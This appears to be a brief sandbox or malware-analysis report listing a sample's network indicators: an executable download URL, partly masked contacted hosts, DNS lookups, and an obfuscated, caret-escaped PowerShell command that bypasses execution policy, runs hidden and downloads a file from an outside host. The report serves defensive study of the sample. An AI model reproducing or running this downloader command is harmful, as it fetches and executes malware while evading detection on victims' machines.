Technical information
- http://nexcontech.com/wp-content/ay4te/mdp5.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^eRsHE^ll.^E^Xe ^-e^xeCut^I^ONpolIcy^ B^yPaSs^ -N^o^proFi^Le -^W^I^nd^Ow^stY^l^E^ hID^DeN ^(^nE^W-^OBj^EC^T^ sysTE^M^.^NE^T.^WebCL^Ie^nt).DOwNL^oaDfI^lE('http://nexconte...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "poW^eRsHE^ll.^E^Xe ^-e^xeCut^I^ONpolIcy^ B^yPaSs^ -N^o^proFi^Le -^W^I^nd^Ow^stY^l^E^ hID^DeN ^(^nE^W-^OBj^EC^T^ sysTE^M^.^NE^T.^WebCL^Ie^nt).DOwNL^oaDfI^lE('http://nexconte...' (with a hidden window)